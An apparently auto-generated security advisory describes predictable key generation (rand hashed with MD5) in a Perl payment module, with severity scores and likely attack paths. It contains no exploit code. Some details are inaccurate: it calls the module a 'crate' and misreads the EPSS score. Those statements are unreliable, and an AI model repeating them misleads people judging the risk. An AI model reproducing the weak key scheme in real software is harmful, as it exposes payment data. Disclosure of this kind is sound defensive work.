Business::OnlinePayment::StoredTransaction uses a single call to the built‑in rand function, hashes the result with MD5, and treats that as an encryption key. Because rand is a low‑entropy pseudorandom generator and MD5 is not cryptographically secure, the secret key is predictable and vulnerable to brute force or collision attacks. As a result, credit card transaction data that relies on this key for encryption can be decrypted or altered by an attacker, compromising both confidentiality and integrity of payment information. The weakness is aligned with CWE‑338 and CWE‑693.

The vulnerability affects the Perl module Business::OnlinePayment::StoredTransaction, specifically all releases up through version 0.01. Users of this module in any environment that stores encrypted transaction data are concerned.

The CVSS score of 9.1 indicates a high‑severity flaw. The EPSS score of fewer than 1% suggests that, while discovery is unlikely, the impact remains substantial. The vulnerability is not listed in the CISA KEV catalog, yet an attacker who can execute or incorporate the module—whether by running the application, injecting malicious code, or accessing stored data—can potentially reconstruct the weak key and decrypt payment records. The most likely attack vector is local or remote code execution within a web or payment application that imports this module, as inferred from the nature of the crate.